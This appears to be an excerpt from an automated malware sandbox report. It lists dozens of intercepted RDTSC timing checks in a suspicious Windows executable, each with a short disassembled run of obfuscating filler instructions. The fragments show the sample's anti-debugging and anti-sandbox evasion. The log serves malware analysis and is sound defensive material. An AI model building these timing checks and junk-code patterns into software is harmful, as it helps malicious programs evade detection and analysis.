Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49D2A second address: F49D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49E4D second address: F49E7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B57Ch 0x00000008 je 00007FAD4CB4B576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 27053E45h 0x00000017 mov cx, 253Eh 0x0000001b push 0302AE1Bh 0x00000020 pushad 0x00000021 push ebx 0x00000022 push eax 0x00000023 pop eax 0x00000024 pop ebx 0x00000025 jbe 00007FAD4CB4B57Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F49F4B second address: F49F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A149 second address: F4A17F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FAD4CB4B583h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FAD4CB4B57Ah 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jl 00007FAD4CB4B576h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A17F second address: F4A185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A371 second address: F4A3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D2EEEh], ecx 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FAD4CB4B578h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b and dx, DE7Dh 0x00000030 nop 0x00000031 jmp 00007FAD4CB4B583h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3C2 second address: F4A3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3C6 second address: F4A3CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A3CA second address: F4A3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4A8D8 second address: F4A8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD4CB4B57Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAA6 second address: F4AABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FAD4CB7BFFCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AABB second address: F4AAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAC1 second address: F4AAE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FAD4CB7BFFBh 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AAE9 second address: F4AB03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007FAD4CB4B57Eh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AB03 second address: F4AB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FAD4CB7C003h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AC07 second address: F4AC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FAD4CB4B596h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB4B584h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CAFA second address: F8CB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CB00 second address: F8CB2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007FAD4CB4B576h 0x0000000f jmp 00007FAD4CB4B583h 0x00000014 popad 0x00000015 popad 0x00000016 push edi 0x00000017 jp 00007FAD4CB4B57Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CE15 second address: F8CE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FAD4CB7BFF6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF6B second address: F8CF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAD4CB4B576h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF79 second address: F8CF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD4CB7BFF6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF84 second address: F8CF89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF89 second address: F8CF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CF97 second address: F8CFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD4CB4B576h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFAB second address: F8CFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFB1 second address: F8CFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F8CFB5 second address: F8CFC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FAD4CB7BFFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9592B second address: F95933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F95A90 second address: F95AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C000h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9AE97 second address: F9AEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007FAD4CB4B576h 0x0000000b jns 00007FAD4CB4B576h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edx 0x00000018 jmp 00007FAD4CB4B57Bh 0x0000001d pop edx 0x0000001e jc 00007FAD4CB4B57Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9AEC3 second address: F9AEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAD4CB7C007h 0x0000000d jno 00007FAD4CB7BFF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B340 second address: F9B350 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B491 second address: F9B49B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD4CB7BFF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B49B second address: F9B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FAD4CB4B576h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4A9 second address: F9B4AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4AF second address: F9B4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4BB second address: F9B4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B4BF second address: F9B4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 jmp 00007FAD4CB4B57Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAD4CB4B585h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9B63E second address: F9B648 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EB12 second address: F9EB2D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD4CB4B576h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAD4CB4B57Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EC80 second address: F9EC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EDFA second address: F9EE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B585h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE13 second address: F9EE32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD4CB7BFF6h 0x00000008 jmp 00007FAD4CB7C002h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE32 second address: F9EE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE3E second address: F9EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE4E second address: F9EE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FAD4CB4B576h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE5B second address: F9EE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C004h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE75 second address: F9EE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F9EE79 second address: F9EE7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA4990 second address: FA49BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FAD4CB4B576h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007FAD4CB4B576h 0x0000001a jmp 00007FAD4CB4B57Fh 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3B20 second address: FA3B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7BFFAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3B2F second address: FA3B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3C96 second address: FA3CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jng 00007FAD4CB7BFF6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CAE second address: FA3CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CB2 second address: FA3CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA3CB6 second address: FA3CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA42F5 second address: FA42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA42FD second address: FA4302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FA4475 second address: FA447A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAB8E8 second address: FAB8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABA26 second address: FABA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABA2A second address: FABA45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FAD4CB4B582h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABCFB second address: FABCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABCFF second address: FABD1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FAD4CB4B583h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FABD1D second address: FABD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAC03D second address: FAC041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FACE2E second address: FACE57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FAD4CB7BFFDh 0x0000000e jmp 00007FAD4CB7C002h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD128 second address: FAD12C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD12C second address: FAD146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FAD4CB7BFF6h 0x0000000d jp 00007FAD4CB7BFF6h 0x00000013 js 00007FAD4CB7BFF6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FAD146 second address: FAD152 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAD4CB4B57Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB14D0 second address: FB14D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB14D4 second address: FB14DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB06BD second address: FB06C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB086E second address: FB087E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAD4CB4B57Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB087E second address: FB088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FAD4CB7BFF6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB09B0 second address: FB09BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007FAD4CB4B576h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0C5E second address: FB0C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0C62 second address: FB0C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DB8 second address: FB0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DC0 second address: FB0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FAD4CB4B576h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FB0DCD second address: FB0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE3A second address: FBFE40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE40 second address: FBFE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE46 second address: FBFE82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAD4CB4B582h 0x0000000c jmp 00007FAD4CB4B57Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FAD4CB4B58Ch 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFE82 second address: FBFE99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7C000h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBDFD8 second address: FBDFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBDFDE second address: FBDFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE14F second address: FBE159 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
